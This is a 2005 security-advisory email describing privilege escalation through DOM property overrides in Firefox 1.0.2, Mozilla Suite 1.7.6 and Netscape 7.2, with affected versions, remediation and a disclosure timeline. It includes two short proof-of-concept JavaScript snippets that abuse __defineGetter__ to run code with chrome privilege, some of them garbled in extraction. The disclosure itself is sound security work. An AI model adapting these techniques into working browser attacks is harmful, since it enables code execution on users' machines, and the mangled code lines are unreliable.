From: SecuriTeam <>
To: [email protected]
Date: 1 May 2005 17:40:28 +0200
Subject: [NEWS] Multiple Privilege Escalation Via DOM Property Overrides in Mozilla Suite, Firefox and Netscape
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Multiple Privilege Escalation Via DOM Property Overrides in Mozilla Suite,
Firefox and Netscape
Multiple Privilege Escalation in DOM where found in Mozilla based we
browsers (Mozilla suite, Netscape and Firefox) that give attackers the
ability to install malicious code or steal data, requiring only that the
user do commonplace actions like click on a link or open the context menu.
Vulnerable Systems:
* Firefox version 1.0.2 and prior
* Mozilla Suite version 1.7.6 and prior
* Netscape version 7.2
Immune Systems:
* Firefox version 1.0.3
* Mozilla Suite version 1.7.7
By using eval() and other Javascript functions, it is possible to override
properties and methods of DOM nodes and shadow the native values, unless
steps are taken to get the true underlying values. The common cause in
each case was privileged UI code ("chrome") being overly trusting of DOM
nodes from the content window. Scripts in the web page can override
properties and methods of DOM nodes and shadow the native values, unless
steps are taken to get the true underlying values.
Exploit 1:
< body style="width:100%;height:100%;">
Click on document.
< script>
// it needs chrome privilege to get |Components.stack|
var code = "alert('Exploit!\\n\\n' + Components.stack);'body';";
document.body.__defineGetter__("localName", function() {
var s = new String('BODY');
s.toLowerCase = new Script(code);
return s;
Exploit 2:
< script>
// it needs chrome privilege to get |Components.stack|
var code = "alert('Exploit!\\n\\n' + Components.stack);'';";
__defineGetter__("rel", new Script(code));
<link rel="test"/>
< pre>
Target of attack
Firefox 1.0.2
livemarkOnLinkAdded() in browser.js
< i>var erel =;</i>
If pref "" is true:
Firefox 1.0.2
onLinkAdded() in tabbrowser.xml
< i>if (!^|\s)icon(?:\s|$)/i)))
Mozilla 1.7.6
onLinkAdded() in tabbrowser.xml
< i>if (!event.originalTarget.rel.match((/(?:^|\s)icon(?:\s|$)/i)))
Update to the latest Firefox/Mozilla suite web browser or disable
Javascript support.
CVE Information:
Disclosure Timeline:
23-04-2005 - Vulnerability discovered
28-04-2005 - Detailed research
28-04-2005 - Vendor informed
28-04-2005 - Security companies informed
29-04-2005 - More security companies and CERT-FI informed
29-04-2005 - Advisory published
The information has been provided by <>
Juha-Matti Laurio .
The original article can be found at:
For more information about the bug please visit the following site:
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